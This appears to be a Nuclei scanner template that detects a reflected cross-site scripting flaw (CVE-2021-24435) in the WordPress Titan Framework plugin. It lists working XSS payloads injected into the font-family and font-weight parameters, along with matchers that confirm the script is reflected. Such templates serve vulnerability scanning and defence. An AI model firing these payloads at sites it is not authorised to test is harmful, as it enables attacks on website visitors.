id: CVE-2021-24435 info: name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting author: xcapri,ritikchaddha severity: medium description: | The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435 - https://nvd.nist.gov/vuln/detail/CVE-2021-24435 - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.00172 epss-percentile: 0.54295 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: gambit product: titan_framework framework: wordpress tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit http: - method: GET path: - "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27" - "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27" - "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27" stop-at-first-match: true matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: regex regex: - (?i)(onerror=|onclick=)['"]?alert\(document\.domain\)['"]? - '
Grumpy wizards make' condition: and - type: status status: - 200 # digest: 4a0a004730450221008da5c58728595669ead26be4769eeb1df23297dd017f133391e30af74448ead8022002efbda42f14733af66e2bc5905ff385bc483741dc65089be4c32f87fe01ac82:922c64590222798bb761d5b6d8e72950